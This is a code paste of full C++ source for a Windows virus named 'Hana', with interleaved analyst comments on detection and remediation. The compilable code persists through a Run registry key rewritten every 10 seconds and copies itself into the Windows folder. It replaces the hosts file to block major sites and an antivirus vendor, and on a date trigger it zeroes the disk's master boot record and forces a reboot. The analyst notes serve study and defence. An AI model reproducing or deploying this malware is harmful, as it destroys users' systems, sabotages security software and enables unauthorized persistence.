BaSs_HaXoR

Hana Virus Source code [C++]

Feb 16th, 2015
C++ 3.32 KB | None | 0 0
  1. /*
  2. This is my C++ virus called "Hana".
  3.  
  4. Hana means flower in Japanese.
  5.  
  6. Payload:
  7.  
  8. 1.Copy itself to the Windows folder and start on every login.
  9.  
  10. 2.Overwrite the hosts file to block websites.
  11.  
  12. 3.In the year 2014, the virus overwrites the MBR of the hard disk with zeros, leaving the computer unable to boot.
  13.  
  14.  
  15. This virus is compiled with MinGW. IDE used: CodeBlocks
  16. */
  17. #include <Windows.h>
  18.  
  /*
   * CheckTime - date-triggered destructive stage.
   *
   * Reads the local clock and, only when the year is 2014, writes 512 zero
   * bytes through a raw handle to \\.\PhysicalDrive0, shows a message box and
   * then requests a reboot. Returns 0 in every case.
   *
   * Analyst notes:
   *  - The trigger depends solely on the host's local year, so a sandbox run
   *    with a current clock shows none of the disk activity below.
   *  - No API result is checked: if the drive cannot be opened (write access
   *    to a physical drive normally needs an elevated token) the later calls
   *    still run and simply fail.
   *  - Detection: a user-mode process opening \\.\PhysicalDrive0 for write is
   *    rare on workstations and worth alerting on.
   *  - Recovery means restoring sector 0 (boot code and, on MBR-partitioned
   *    disks, the partition table) from backup or repair tooling.
   */
  19. DWORD WINAPI CheckTime(){
  20. DWORD write;
  21. SYSTEMTIME st;
  // 512 zero bytes: the payload buffer, cleared on the next line.
  22. char data[512];
  23. ZeroMemory(&data,sizeof(data));
  24. GetLocalTime(&st);
  // Fires for the whole calendar year 2014 (local time); any other year is a no-op.
  25. if(st.wYear==2014){
  // Raw device handle; the result is not compared with INVALID_HANDLE_VALUE.
  26. HANDLE disk=CreateFile("\\\\.\\PhysicalDrive0",GENERIC_ALL,FILE_SHARE_READ|FILE_SHARE_WRITE,NULL,OPEN_EXISTING,0,NULL);
  // Freshly opened handle with no seek: the write lands at offset 0 (first sector).
  27. WriteFile(disk,data,512,&write,NULL);
  28. CloseHandle(disk);
  // Modal dialog: blocks this thread until dismissed, then the reboot is requested.
  29. MessageBox(0,"Time to die now!","You have been hacked!",MB_ICONWARNING);
  30. ExitWindowsEx(EWX_REBOOT,0);
  31. }
  32. return 0;
  33. }
  34.  
  /*
   * hosts - replaces the system hosts file.
   *
   * Builds <windir>\system32\drivers\etc\hosts, opens it with CREATE_ALWAYS
   * (any existing content is discarded) and writes the embedded byte array.
   * Returns 0 in every case; no API result is checked.
   *
   * The array is plain ASCII, CRLF-separated, one line per site, each pairing
   * a host name with 127.0.0.1: www.youtube.com, www.google.com,
   * www.yahoo.com, www.facebook.com, www.microsoft.com, www.eset.com,
   * www.eset.eu and en.wikipedia.org. The file header states the intent is to
   * block websites; targeting an antivirus vendor's domains is a common sign
   * of interference with security products.
   *
   * Analyst notes:
   *  - Detection: file-integrity monitoring on the hosts file; a complete
   *    rewrite by a non-system process is a strong signal.
   *  - Remediation: restore the hosts file from a known-good copy, because
   *    this code does not preserve the previous entries anywhere.
   *  - Writing under system32 normally needs administrative rights; without
   *    them the open fails and the function still returns 0.
   */
  35. DWORD WINAPI hosts(){
  // Hex-encoded ASCII (see the decoded host list in the header comment above this function).
  36. char data[]={0x77,0x77,0x77,0x2E,0x79,0x6F,0x75,0x74,0x75,0x62,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x67,0x6F,0x6F,0x67,0x6C,0x65,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x79,0x61,0x68,0x6F,0x6F,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x66,0x61,0x63,0x65,0x62,0x6F,0x6F,0x6B,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x6D,0x69,0x63,0x72,0x6F,0x73,0x6F,0x66,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x63,0x6F,0x6D,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x77,0x77,0x77,0x2E,0x65,0x73,0x65,0x74,0x2E,0x65,0x75,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31,0x0D,0x0A,0x65,0x6E,0x2E,0x77,0x69,0x6B,0x69,0x70,0x65,0x64,0x69,0x61,0x2E,0x6F,0x72,0x67,0x20,0x31,0x32,0x37,0x2E,0x30,0x2E,0x30,0x2E,0x31};
  37. char path[60];
  38. DWORD write;
  // Target path is derived from the windir environment variable of this process.
  39. GetEnvironmentVariable("windir",path,sizeof(path));
  40. strcat(path,"\\system32\\drivers\\etc\\hosts");
  // Share mode 0 requests exclusive access while open; CREATE_ALWAYS truncates the file.
  41. HANDLE hFile=CreateFile(path,GENERIC_ALL,0,NULL,CREATE_ALWAYS,0,NULL);
  // data has no terminating NUL, so sizeof(data) is exactly the text written.
  42. WriteFile(hFile,data,sizeof(data),&write,NULL);
  43. CloseHandle(hFile);
  44. return 0;
  45. }
  46.  
  /*
   * reg - persistence thread.
   *
   * Every 10 seconds, (re)creates the value "Hana" with data "hana.exe" under
   * HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run.
   * The loop never exits, so the trailing return is unreachable.
   * No API result is checked.
   *
   * Analyst notes:
   *  - Remediation order matters: the value is rewritten every 10 seconds
   *    while the process is alive, so end the process before deleting the
   *    Run value and the copied executable.
   *  - Detection: registry auditing or Sysmon registry value-set events
   *    (Event ID 13) on the Run key show the same image writing repeatedly.
   *  - Forensics: cbData is hard-coded to 60 although value[] holds 9 bytes,
   *    so the raw value data may carry trailing bytes after the terminator.
   *  - Writing to HKEY_LOCAL_MACHINE normally needs administrative rights.
   */
  47. DWORD WINAPI reg(){
  48. char value[]="hana.exe";
  49. HKEY hKey;
  50. while(1){
  // Opens the key if it exists, otherwise creates it.
  51. RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run",&hKey);
  // Value name "Hana", type REG_SZ, data taken from value[] with a fixed length of 60.
  52. RegSetValueEx(hKey,"Hana",0,REG_SZ,(LPBYTE)value,60);
  53. RegCloseKey(hKey);
  // 10-second interval between rewrites.
  54. Sleep(10000);
  55. }
  56. return 0;
  57. }
  58.  
  /*
   * WinMain - entry point.
   *
   * 1. Enables SeShutdownPrivilege on the process token (CheckTime later
   *    calls ExitWindowsEx).
   * 2. Copies the running image to <windir>\hana.exe, overwriting any
   *    existing file of that name.
   * 3. Starts one thread each for reg and hosts, then starts a new CheckTime
   *    thread every 10 seconds in a loop that never exits.
   * None of the parameters is used and no API result is checked.
   *
   * Analyst notes:
   *  - Indicators visible in this listing: the file <windir>\hana.exe, the
   *    Run value named "Hana", and the message-box strings in CheckTime.
   *  - Every stage (copy into the Windows directory, HKLM write, hosts file
   *    rewrite, physical-drive write) normally requires administrative
   *    rights; running users without local admin limits what this sample can
   *    do - verify in the analysis environment.
   *  - The process stays resident and the handles returned by CreateThread
   *    and OpenProcessToken are never closed.
   */
  59. int WinMain(HINSTANCE hInst,HINSTANCE hPrev,LPSTR cmd,int show){
  60. char file[MAX_PATH];
  61. char path[60];
  62. HANDLE hToken;
  63. LUID luid;
  // Resolve the LUID for the shutdown privilege on the local system.
  64. LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&luid);
  65. TOKEN_PRIVILEGES tp;
  66. tp.Privileges[0].Luid=luid;
  67. tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
  68. tp.PrivilegeCount=1;
  // Token is opened with TOKEN_ALL_ACCESS and the single privilege above is enabled.
  69. OpenProcessToken(GetCurrentProcess(),TOKEN_ALL_ACCESS,&hToken);
  70. AdjustTokenPrivileges(hToken,false,&tp,sizeof(tp),NULL,NULL);
  // NULL module handle: returns the path of the currently running executable.
  71. GetModuleFileName(NULL,file,sizeof(file));
  72. GetEnvironmentVariable("windir",path,60);
  73. strcat(path,"\\hana.exe");
  // bFailIfExists is false, so an existing <windir>\hana.exe is replaced.
  74. CopyFile(file,path,false);
  // One-shot workers: registry persistence loop and hosts file rewrite.
  75. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)reg,NULL,0,NULL);
  76. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)hosts,NULL,0,NULL);
  // Date check is re-run in a fresh thread every 10 seconds for the life of the process.
  77. while(1){
  78. CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)CheckTime,NULL,0,NULL);
  79. Sleep(10000);
  80. }
  81. return 0;
  82. }
  83. //Source: http://www.rohitab.com/discuss/topic/39459-my-c-virus/
  84. //BaSs_HaXoR